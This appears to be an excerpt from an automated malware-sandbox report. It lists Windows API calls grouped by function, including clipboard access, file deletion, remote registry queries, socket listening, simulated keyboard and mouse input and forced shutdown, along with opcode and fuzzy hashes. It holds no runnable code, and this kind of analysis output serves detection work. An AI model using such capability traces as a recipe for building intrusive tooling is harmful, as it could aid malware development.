                            • Part of subcall function 00F61193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F60BB1,?), ref: 00F611A8
                            • Part of subcall function 00F61193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F60BB1,?), ref: 00F611B7
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          APIs
                          • OpenClipboard.USER32(00F9CC08), ref: 00F7EB29
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F7EB37
                          • GetClipboardData.USER32(0000000D), ref: 00F7EB43
                          • CloseClipboard.USER32 ref: 00F7EB4F
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EB87
                          • CloseClipboard.USER32 ref: 00F7EB91
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F7EBBC
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00F7EBC9
                          • GetClipboardData.USER32(00000001), ref: 00F7EBD1
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EBE2
                          • GlobalUnlock.KERNEL32(00000000,?), ref: 00F7EC22
                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F7EC38
                          • GetClipboardData.USER32(0000000F), ref: 00F7EC44
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EC55
                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F7EC77
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7EC94
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7ECD2
                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00F7ECF3
                          • CountClipboardFormats.USER32 ref: 00F7ED14
                          • CloseClipboard.USER32 ref: 00F7ED59
                          Similarity
                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                          • String ID:
                          • API String ID: 420908878-0
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F769BE
                          • FindClose.KERNEL32(00000000), ref: 00F76A12
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F76A4E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F76A75
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F76AB2
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F76ADF
                          Similarity
                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                          • API String ID: 3830820486-3289030164
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F79663
                          • GetFileAttributesW.KERNEL32(?), ref: 00F796A1
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00F796BB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F796D3
                          • FindClose.KERNEL32(00000000), ref: 00F796DE
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00F796FA
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7974A
                          • SetCurrentDirectoryW.KERNEL32(00FC6B7C), ref: 00F79768
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F79772
                          • FindClose.KERNEL32(00000000), ref: 00F7977F
                          • FindClose.KERNEL32(00000000), ref: 00F7978F
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F797BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F79819
                          • FindClose.KERNEL32(00000000), ref: 00F79824
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00F79840
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F79890
                          • SetCurrentDirectoryW.KERNEL32(00FC6B7C), ref: 00F798AE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F798B8
                          • FindClose.KERNEL32(00000000), ref: 00F798C5
                          • FindClose.KERNEL32(00000000), ref: 00F798D5
                            • Part of subcall function 00F6DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F6DB00
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          APIs
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BF3E
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F8BFA9
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BFCD
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8C02C
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8C0E7
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C154
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C1E9
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8C23A
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C2E3
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8C382
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8C38F
                          Similarity
                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                          • String ID:
                          • API String ID: 3102970594-0
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00F78257
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F78267
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F78273
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F78310
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78324
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78356
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F7838C
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78395
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local$System
                          • String ID: *.*
                          • API String ID: 1464919966-438819550
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F6D122
                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F6D1DD
                          • MoveFileW.KERNEL32(?,?), ref: 00F6D1F0
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6D20D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6D237
                            • Part of subcall function 00F6D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F6D21C,?,?), ref: 00F6D2B2
                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00F6D253
                          • FindClose.KERNEL32(00000000), ref: 00F6D264
                          Similarity
                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 1946585618-1173974218
                          APIs
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          APIs
                            • Part of subcall function 00F616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                            • Part of subcall function 00F616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                            • Part of subcall function 00F616C3: GetLastError.KERNEL32 ref: 00F6174A
                          • ExitWindowsEx.USER32(?,00000000), ref: 00F6E932
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $ $@$SeShutdownPrivilege
                          • API String ID: 2234035333-3163812486
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F81276
                          • WSAGetLastError.WSOCK32 ref: 00F81283
                          • bind.WSOCK32(00000000,?,00000010), ref: 00F812BA
                          • WSAGetLastError.WSOCK32 ref: 00F812C5
                          • closesocket.WSOCK32(00000000), ref: 00F812F4
                          • listen.WSOCK32(00000000,00000005), ref: 00F81303
                          • WSAGetLastError.WSOCK32 ref: 00F8130D
                          • closesocket.WSOCK32(00000000), ref: 00F8133C
                          Similarity
                          • API ID: ErrorLast$closesocket$bindlistensocket
                          • String ID:
                          • API String ID: 540024437-0
                          • Opcode ID: bc3a370aee57fb978a2c2fed2c85cb33426d61a6088e054a4f9ac0a60035bb95
                          • Instruction ID: 116e42383d3b79b897e50d0cd73bc0057cf3eb6a7e03873e8cd541703562b780
                          • Opcode Fuzzy Hash: bc3a370aee57fb978a2c2fed2c85cb33426d61a6088e054a4f9ac0a60035bb95
                          • Instruction Fuzzy Hash: 4041B631A001049FD710EF64C884B69BBE5BF46328F188289D8568F2D6C775ED82EBE1
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F6D420
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6D470
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6D481
                          • FindClose.KERNEL32(00000000), ref: 00F6D498
                          • FindClose.KERNEL32(00000000), ref: 00F6D4A1
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          • Opcode ID: a14834d7d6a60a8b95f7586272854c41acce835ec532c4be7aae7ea806945b3d
                          • Instruction ID: dbb4e16bbbc71e40f771ea418a2a083a6aa7ed92a3fc0e756c9644c9e3f733bd
                          • Opcode Fuzzy Hash: a14834d7d6a60a8b95f7586272854c41acce835ec532c4be7aae7ea806945b3d
                          • Instruction Fuzzy Hash: 1C314B715083459BC204EF64DC929AFB7E8AE91314F844A1EF4D1921D1EB34AA09BBA3
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 6aaaea51e0156535a99e6ff7ec0ae8114e642fd7f7e5a0a012450f8161e801c2
                          • Instruction ID: 1e2aa11153eaa5333b720cb3c23e4902f4871348ecaa30abd4dad1e51e45dfab
                          • Opcode Fuzzy Hash: 6aaaea51e0156535a99e6ff7ec0ae8114e642fd7f7e5a0a012450f8161e801c2
                          • Instruction Fuzzy Hash: 1FC24C72E046288FDB65CE28DD407EAB7B5EF44324F1441EAD84DE7281E778AE859F40
                          APIs
                          • _wcslen.LIBCMT ref: 00F764DC
                          • CoInitialize.OLE32(00000000), ref: 00F76639
                          • CoCreateInstance.OLE32(00F9FCF8,00000000,00000001,00F9FB68,?), ref: 00F76650
                          • CoUninitialize.OLE32 ref: 00F768D4
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: 7ca500a061d437ce6c3bcca8271f4f270385c2b18938448a3f3f33b7469afd20
                          • Instruction ID: 4603d9d423964ff34fd4dcf8f76f48550a8b10f3a2c6dda281ac38affc7bd544
                          • Opcode Fuzzy Hash: 7ca500a061d437ce6c3bcca8271f4f270385c2b18938448a3f3f33b7469afd20
                          • Instruction Fuzzy Hash: DFD13A715087019FD304EF24C881A6BB7E9FF98704F44896DF599CB291EB70E909EB92
                          APIs
                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00F822E8
                            • Part of subcall function 00F7E4EC: GetWindowRect.USER32(?,?), ref: 00F7E504
                          • GetDesktopWindow.USER32 ref: 00F82312
                          • GetWindowRect.USER32(00000000), ref: 00F82319
                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F82355
                          • GetCursorPos.USER32(?), ref: 00F82381
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F823DF
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                          • String ID:
                          • API String ID: 2387181109-0
                          • Opcode ID: 73ca8d63e95520f6e4c8ea10521e68c3cd805d5dc24817875524e65db3de234c
                          • Instruction ID: 21f191d1cc47c79128544f97cd5515cdc8b741db3c738e0104808198c44d4832
                          • Opcode Fuzzy Hash: 73ca8d63e95520f6e4c8ea10521e68c3cd805d5dc24817875524e65db3de234c
                          • Instruction Fuzzy Hash: 8631B072504315AFD760EF54CC45B9BB7A9FF84314F00091AF98597191DB34E908DBD2
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F79B78
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F79C8B
                            • Part of subcall function 00F73874: GetInputState.USER32 ref: 00F738CB
                            • Part of subcall function 00F73874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F73966
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F79BA8
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F79C75
                          Similarity
                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                          • String ID: *.*
                          • API String ID: 1972594611-438819550
                          • Opcode ID: c577c02a963c3d8a79afaba2e111f4e40b5d86c6aaf1de05f4631178cd5bddde
                          • Instruction ID: 5a09efa150b27329fa17c73e4743bdbf2d529eb4a7e115ffdf90a012647be544
                          • Opcode Fuzzy Hash: c577c02a963c3d8a79afaba2e111f4e40b5d86c6aaf1de05f4631178cd5bddde
                          • Instruction Fuzzy Hash: D241B471D0820AAFCF15DF64CD85AEE7BF8EF05310F148056E409A2191EB749E84EF61
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F19A4E
                          • GetSysColor.USER32(0000000F), ref: 00F19B23
                          • SetBkColor.GDI32(?,00000000), ref: 00F19B36
                          Similarity
                          • API ID: Color$LongProcWindow
                          • String ID:
                          • API String ID: 3131106179-0
                          • Opcode ID: 687518c5c178ec077bb7428a270ad70cb1e65d6ad692447210c24df8038ac30c
                          • Instruction ID: c2e1c9abe8c763aa00baa3d34280b4f9ddb0e6d14d195edf92899a00aa75b938
                          • Opcode Fuzzy Hash: 687518c5c178ec077bb7428a270ad70cb1e65d6ad692447210c24df8038ac30c
                          • Instruction Fuzzy Hash: 15A14D7160C504BEE724EA3CAC78EFB369DEF46351B150109F902C6591C6AD9D89F2F2
                          APIs
                            • Part of subcall function 00F8304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                            • Part of subcall function 00F8304E: _wcslen.LIBCMT ref: 00F8309B
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F8185D
                          • WSAGetLastError.WSOCK32 ref: 00F81884
                          • bind.WSOCK32(00000000,?,00000010), ref: 00F818DB
                          • WSAGetLastError.WSOCK32 ref: 00F818E6
                          • closesocket.WSOCK32(00000000), ref: 00F81915
                          Similarity
                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 1601658205-0
                          • Opcode ID: be746fcabb8ab993bdbfe034ad2b3eee1cd25b01b8db52d17e7e27e8cfb8a821
                          • Instruction ID: 6d4b1253aea9449c9d9220ecbe10e6b10175184f1f126266efb0c40d866fd7b2
                          • Opcode Fuzzy Hash: be746fcabb8ab993bdbfe034ad2b3eee1cd25b01b8db52d17e7e27e8cfb8a821
                          • Instruction Fuzzy Hash: 1B519471A002109FDB10EF24CC86F6A77E5AB44718F188598F9059F3D3CB75AD42ABE1
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 276f71666de6a36d577f57c5272d3212260aae58c8a9347c4f340d9dc06a6e3d
                          • Instruction ID: f27055aaf3176b89402eb346cfe67e46aa10d9b248203317c48b5f3b66f9e6af
                          • Opcode Fuzzy Hash: 276f71666de6a36d577f57c5272d3212260aae58c8a9347c4f340d9dc06a6e3d
                          • Instruction Fuzzy Hash: 7821A631B402125FEB218F1AD844B667BA5FF85325B198069E8468B351CB75DC42EBD0
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8A6AC
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00F8A6BA
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • Process32NextW.KERNEL32(00000000,?), ref: 00F8A79C
                          • CloseHandle.KERNEL32(00000000), ref: 00F8A7AB
                            • Part of subcall function 00F1CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F43303,?), ref: 00F1CE8A
                          Similarity
                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                          • String ID:
                          • API String ID: 1991900642-0
                          • Opcode ID: 5f57ba4e49752f760840f38b761c15f595c198fb702ec6bbede7d34d61e86c1d
                          • Instruction ID: 6bfc59af47158599ccea5d0feb419f01aedd6243a4a09657377e021f382bda72
                          • Opcode Fuzzy Hash: 5f57ba4e49752f760840f38b761c15f595c198fb702ec6bbede7d34d61e86c1d
                          • Instruction Fuzzy Hash: 68516D715083009FD710EF24CC86A6BBBE8FF89754F40891DF58597292EB74D944EBA2
                          APIs
                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F6AAAC
                          • SetKeyboardState.USER32(00000080), ref: 00F6AAC8
                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F6AB36
                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F6AB88
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 29c113153e89ff3aaf4736c11ae99df544df8ae3397ef05a3b8f56690299f1e8
                          • Instruction ID: 7c5e44c28e2ce374d680de814bd0bc35b00d11c1c0dc370b81fe0ec073545e45
                          • Opcode Fuzzy Hash: 29c113153e89ff3aaf4736c11ae99df544df8ae3397ef05a3b8f56690299f1e8
                          • Instruction Fuzzy Hash: 9931F831E40648AEFB35CB658C05BFE7BAAAB85320F04421BF585661D1D3758D81FBA2
                          APIs
                          • _free.LIBCMT ref: 00F3BB7F
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • GetTimeZoneInformation.KERNEL32 ref: 00F3BB91
                          • WideCharToMultiByte.KERNEL32(00000000,?,00FD121C,000000FF,?,0000003F,?,?), ref: 00F3BC09
                          • WideCharToMultiByte.KERNEL32(00000000,?,00FD1270,000000FF,?,0000003F,?,?,?,00FD121C,000000FF,?,0000003F,?,?), ref: 00F3BC36
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                          • String ID:
                          • API String ID: 806657224-0
                          • Opcode ID: 11a9b415fcd39e093d4bf081e6db224d8a19046a4ec0ca62e68d14a71613606f
                          • Instruction ID: 3122bfd8a141fa960a7f6ff5e35d0d2efd05c90014713c508568175e0d11e3ee
                          • Opcode Fuzzy Hash: 11a9b415fcd39e093d4bf081e6db224d8a19046a4ec0ca62e68d14a71613606f
                          • Instruction Fuzzy Hash: 5431AF71904209EFCB11DF69DC90929BBB9FF45371B1442ABE160DB2A1DB319E40FB50
                          APIs
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00F7CE89
                          • GetLastError.KERNEL32(?,00000000), ref: 00F7CEEA
                          • SetEvent.KERNEL32(?,?,00000000), ref: 00F7CEFE
                          Similarity
                          • API ID: ErrorEventFileInternetLastRead
                          • String ID:
                          • API String ID: 234945975-0
                          • Opcode ID: 1fd79c43f529831d24dea8d7cce25fec68f204947403f35c6ca1bf80624fe72f
                          • Instruction ID: 19da6cb204daa175b2f552f63803010bb773eb8d3708b6e2130d31668c621140
                          • Opcode Fuzzy Hash: 1fd79c43f529831d24dea8d7cce25fec68f204947403f35c6ca1bf80624fe72f
                          • Instruction Fuzzy Hash: 6321BAB1900705ABEB20DFA5D948BA6B7F8EB40324F10841FE64AD2151E774EE44ABA1
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F682AA
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          • Opcode ID: 9358a7b94d949fcbb6e5eec2e0333a0e2376bc878b906c67b3cdd0ac28f33378
                          • Instruction ID: 53f318aad80c4e486ce3d0675907bf745807639c38e30b07c7c1a2e9cb280c21
                          • Opcode Fuzzy Hash: 9358a7b94d949fcbb6e5eec2e0333a0e2376bc878b906c67b3cdd0ac28f33378
                          • Instruction Fuzzy Hash: BA323775A007059FCB28CF59C481A6AB7F0FF48760B15C56EE49ADB3A1EB70E942DB40
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F75CC1
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F75D17
                          • FindClose.KERNEL32(?), ref: 00F75D5F
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: d176b6138eaba02ec0b61051452f2e1d4b449b19571bd740d5bab3bdca2148fe
                          • Instruction ID: 86f37b2c2f08cc34313dc3e82bdd3d371c9cc582ebc083d26595f33e7b0ae46e
                          • Opcode Fuzzy Hash: d176b6138eaba02ec0b61051452f2e1d4b449b19571bd740d5bab3bdca2148fe
                          • Instruction Fuzzy Hash: 81519A74A046019FC714CF28C884E96B7E4FF49324F14855EE95A8B3A2CB74FC04EB92
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 00F3271A
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F32724
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F32731
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: fedf2994518bd61acb083c7d41200e5bfb904dc492affbd49301697a00693db4
                          • Instruction ID: ba0480d7984b169649a6d469d947b5a6562ae9530ada2193db8dd297be4d2231
                          • Opcode Fuzzy Hash: fedf2994518bd61acb083c7d41200e5bfb904dc492affbd49301697a00693db4
                          • Instruction Fuzzy Hash: B631D77591122CABCB61DF64DC89B9CB7B8BF08320F5041DAE40CA7261E7349F819F84
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F751DA
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F75238
                          • SetErrorMode.KERNEL32(00000000), ref: 00F752A1
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: 16345a4ef3b3adeb791ea0220922a3d4c16e91c1786b8657a66d4a1033865efa
                          • Instruction ID: 790ca00259edbcfc45e2a19de466ea7191111ff6782ab779528fbedd5e19f2f2
                          • Opcode Fuzzy Hash: 16345a4ef3b3adeb791ea0220922a3d4c16e91c1786b8657a66d4a1033865efa
                          • Instruction Fuzzy Hash: 3E316175A00518DFDB00DF54D884EADBBF4FF49314F088099E809AB3A2DB75E856DBA1
                          APIs
                            • Part of subcall function 00F1FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F20668
                            • Part of subcall function 00F1FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F20685
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                          • GetLastError.KERNEL32 ref: 00F6174A
                          Similarity
                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                          • String ID:
                          • API String ID: 577356006-0
                          • Opcode ID: df6b58ab29503ded93a9c2a8f9b4add7834839a7d2c177cfc003f66743bb42ff
                          • Instruction ID: 9122121bb26d3e9ea4c8c294381f12b0f13e4d67cfbbc343579fb9536d1dd40b
                          • Opcode Fuzzy Hash: df6b58ab29503ded93a9c2a8f9b4add7834839a7d2c177cfc003f66743bb42ff
                          • Instruction Fuzzy Hash: 361191B2404308AFD7189F54EC86DAAB7B9FB44714B24852EE05697251EB70BC459B60
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F6D608
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F6D645
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F6D650
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: d0db568efcb627caa7ac7ed92d3d8093a69a0564875f26c23efae82b4f2bc326
                          • Instruction ID: c1f47b0b8eb5f5a64959a8322e03794f161d2fa06aaa0f4b51697669e03d11f7
                          • Opcode Fuzzy Hash: d0db568efcb627caa7ac7ed92d3d8093a69a0564875f26c23efae82b4f2bc326
                          • Instruction Fuzzy Hash: 6A115E75E05228BFDB108F95DC45FAFBBBCEB45B60F108116F904E7290D6704A059BE1
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F6168C
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F616A1
                          • FreeSid.ADVAPI32(?), ref: 00F616B1
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: ea7c271e9310a2ce0891eb27337715b9ace55b5aafc916ed7fa496f58607bfb1
                          • Instruction ID: 1ed5e520118a61e01e294dd86122da0f97e4e5eaf99f14929e9d25e53b5e2ddb
                          • Opcode Fuzzy Hash: ea7c271e9310a2ce0891eb27337715b9ace55b5aafc916ed7fa496f58607bfb1
                          • Instruction Fuzzy Hash: FAF0447194030CFBDB00CFE0CC89AAEBBBCFB08200F404561E500E2190E331AA049A90
                          APIs
                          • GetCurrentProcess.KERNEL32(00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000,?,00F328E9), ref: 00F24D09
                          • TerminateProcess.KERNEL32(00000000,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000,?,00F328E9), ref: 00F24D10
                          • ExitProcess.KERNEL32 ref: 00F24D22
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: e60c9465bcf3466d4b8d59c7bf7af4385d865f148a5f1fc42503614a55cb429d
                          • Instruction ID: 28552e9beecda08934f867085d898d13f428062548e5e269a8447d6a9857297b
                          • Opcode Fuzzy Hash: e60c9465bcf3466d4b8d59c7bf7af4385d865f148a5f1fc42503614a55cb429d
                          • Instruction Fuzzy Hash: 41E0B631800158AFCF11AF54EE0AE583B69EB41B91F504015FD098B122CB79ED42EA90
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 00F5D28C
                          Strings
                          Similarity
                          • API ID: NameUser
                          • String ID: X64
                          • API String ID: 2645101109-893830106
                          • Opcode ID: 099b942afdf2a85f542ce5e4e974818bf42157660f47a3a0ea5a70efcc239e2e
                          • Instruction ID: ac5d733dd24e62b4d303f2172ae4a3016575b9d97a8dc23b5796933f834913c4
                          • Opcode Fuzzy Hash: 099b942afdf2a85f542ce5e4e974818bf42157660f47a3a0ea5a70efcc239e2e
                          • Instruction Fuzzy Hash: 14D0C9B580111DEECB94CB90DC88EDDB37CBB04305F100152F506E2000D7709548AF20
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction ID: 7ffd6950c50fc709e565be718bd536ba32cfd53d819aeab46ff1c625d6e5293d
                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction Fuzzy Hash: 9C023D72E011299BDF14CFA9D9806ADBBF1EF88324F25416AD919E7380D731AA419BD0
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F76918
                          • FindClose.KERNEL32(00000000), ref: 00F76961
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
